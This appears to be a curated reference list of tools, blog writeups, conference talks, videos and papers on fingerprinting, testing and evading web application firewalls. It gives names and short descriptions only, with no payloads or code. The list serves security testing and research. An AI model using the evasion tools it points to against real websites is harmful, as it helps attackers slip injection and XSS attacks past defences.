Awesome-WAF - The Definitive Guide.
Detection and Fingerprinting Tools
- WhatWaf - Detect and bypass web application firewalls and protection systems
- WAFW00F - The ultimate WAF fingerprinting tool with the largest fingerprint database from @EnableSecurity.
- IdentYwaf - A blind WAF detection tool which utilises a unique method of identifying WAFs based upon previously collected fingerprints by @stamparm.
WAF Testing Guides and Tools
- XSS-Rat's WAF Checklist - Everything you need to do to bypass a Web Application Firewall.
- GoTestWAF - A tool to test a WAF's detection logic and bypasses from @wallarm.
- Lightbulb Framework - A WAF testing suite written in Python.
- WAFBench - A WAF performance testing suite by Microsoft.
- WAF Testing Framework - A WAF testing tool by Imperva.
- Framework for Testing WAFs (FTW) - A framework by the OWASP CRS team that helps to provide rigorous tests for WAF rules by using the OWASP Core Ruleset V3 as a baseline.
- abuse-ssl-bypass-waf - Bypassing WAF by abusing SSL/TLS Ciphers
WAF Evasion and Bypass Tools
- WAFNinja - A smart tool which fuzzes and can suggest bypasses for a given WAF by @khalilbijjou.
- WAFTester - Another tool which can obfuscate payloads to bypass WAFs by @Raz0r.
- libinjection-fuzzer - A fuzzer intended for finding libinjection bypasses but can probably be used universally.
- bypass-firewalls-by-DNS-history - Firewall bypass script based on DNS history records. This script will search for DNS A history records and check if the server replies for that domain. Handy for bug bounty hunters.
- abuse-ssl-bypass-waf - A tool which finds out supported SSL/TLS ciphers and helps in evading WAFs.
- SQLMap Tamper Scripts - Tamper scripts in SQLMap obfuscate payloads which might evade some WAFs.
- Bypass WAF BurpSuite Plugin - A plugin for Burp Suite which adds some request headers so that the requests appear to come from the internal network.
- Bypass Payloads
{% tabs %} {% tab title="Blogs and Writeups" %}
Much of the content mentioned above has been taken from the following excellent writeups:
- Web Application Firewall (WAF) Evasion Techniques #1 - By @Secjuice.
- Web Application Firewall (WAF) Evasion Techniques #2 - By @Secjuice.
- Web Application Firewall (WAF) Evasion Techniques #3 - By @Secjuice.
- How To Exploit PHP Remotely To Bypass Filters & WAF Rules - By @Secjuice.
- ModSecurity SQL Injection Challenge: Lessons Learned - By @SpiderLabs.
- XXE that can Bypass WAF - By @WallArm.
- SQL Injection Bypassing WAF - By @OWASP.
- How To Reverse Engineer A Web Application Firewall Using Regular Expression Reversing - By @SunnyHoi.
- Bypassing Web-Application Firewalls by abusing SSL/TLS - By @0x09AL.
- Request Encoding to Bypass WAFs - By @Soroush Dalili {% endtab %}
{% tab title="Presentations" %}
- Methods to Bypass a Web Application Firewall - A presentation from PT Security about bypassing WAF filters and evasion.
- Web Application Firewall Bypassing (How to Defeat the Blue Team) - A presentation about bypassing WAF filtering and ruleset fuzzing for evasion by @OWASP.
- WAF Profiling & Evasion Techniques - A WAF testing and evasion guide from OWASP.
- Protocol Level WAF Evasion Techniques - A presentation about efficiently evading WAFs at the protocol level from BlackHat US 12.
- Analysing Attacking Detection Logic Mechanisms - A presentation about WAF logic applied to detecting attacks from BlackHat US 16.
- WAF Bypasses and PHP Exploits - A presentation about evading WAFs and developing related PHP exploits.
- Side Channel Attacks for Fingerprinting WAF Filter Rules - A presentation about how side channel attacks can be utilised to fingerprint firewall filter rules from UseNix Woot'12.
- Our Favorite XSS Filters/IDS and how to Attack Them - A presentation about how to evade XSS filters set by WAF rules from BlackHat USA 09.
- Playing Around with WAFs - A small presentation about WAF profiling and playing around with them from Defcon 16.
- A Forgotten HTTP Invisibility Cloak - A presentation about techniques that can be used to bypass common WAFs from BSides Manchester.
- Building Your Own WAF as a Service and Forgetting about False Positives - A presentation about how to build a hybrid-mode WAF that can work both out-of-band and inline to reduce false positives and latency, from Auscert2019. {% endtab %}
{% tab title="Videos" %}
- WAF Bypass Techniques Using HTTP Standard and Web Servers Behavior from @OWASP.
- Confessions of a WAF Developer: Protocol-Level Evasion of Web App Firewalls from BlackHat USA 12.
- Web Application Firewall - Analysis of Detection Logic from BlackHat.
- Bypassing Browser Security Policies for Fun & Profit from BlackHat.
- Web Application Firewall Bypassing from Positive Technologies.
- Fingerprinting Filter Rules of Web Application Firewalls - Side Channeling Attacks from @UseNix.
- Evading Deep Inspection Systems for Fun and Shell from BlackHat US 13.
- Bypass OWASP CRS && CWAF (WAF Rule Testing - Unrestricted File Upload) from Fools of Security.
- WAFs FTW! A modern devops approach to security testing your WAF from AppSec USA 17.
- Web Application Firewall Bypassing WorkShop from OWASP.
- Bypassing Modern WAF's Exemplified At XSS by Rafay Baloch from Rafay Baloch.
- WTF - WAF Testing Framework from AppSecUSA 13.
- The Death of a Web App Firewall from Brian McHenry.
- Adventures with the WAF from BSides Manchester.
- Bypassing Intrusion Detection Systems from BlackHat.
- Building Your Own WAF as a Service and Forgetting about False Positives from Auscert. {% endtab %}
{% tab title="Research Papers" %}
- Protocol Level WAF Evasion - Protocol-level WAF evasion techniques and analysis by Qualys.
- Neural Network based WAF for SQLi - A paper about building a neural network based WAF for detecting SQLi attacks.
- Bypassing Web Application Firewalls with HTTP Parameter Pollution - A research paper from Exploit DB about effectively bypassing WAFs via HTTP Parameter Pollution.
- Poking A Hole in the Firewall - A paper by Rafay Baloch about modern firewall analysis.
- Modern WAF Fingerprinting and XSS Filter Bypass - A paper by Rafay Baloch about WAF fingerprinting and bypassing XSS filters.
- WAF Evasion Testing - A WAF evasion testing guide from SANS.
- Side Channel Attacks for Fingerprinting WAF Filter Rules - A paper about how side channel attacks can be utilised to fingerprint firewall filter rules from UseNix Woot'12.
- WASC WAF Evaluation Criteria - A guide for WAF Evaluation from Web Application Security Consortium.
- WAF Evaluation and Analysis - A paper about WAF evaluation and analysis of the 2 most used WAFs (ModSecurity & WebKnight) from University of Amsterdam.
- Bypassing all WAF XSS Filters - A paper about bypassing all XSS filter rules and evading WAFs for XSS.
- Beyond SQLi - Obfuscate and Bypass WAFs - A research paper from Exploit Database about obfuscating SQL injection queries to effectively bypass WAFs.
- Bypassing WAF XSS Detection Mechanisms - A research paper about bypassing XSS detection mechanisms in WAFs. {% endtab %} {% endtabs %}
Cloudflare Bypass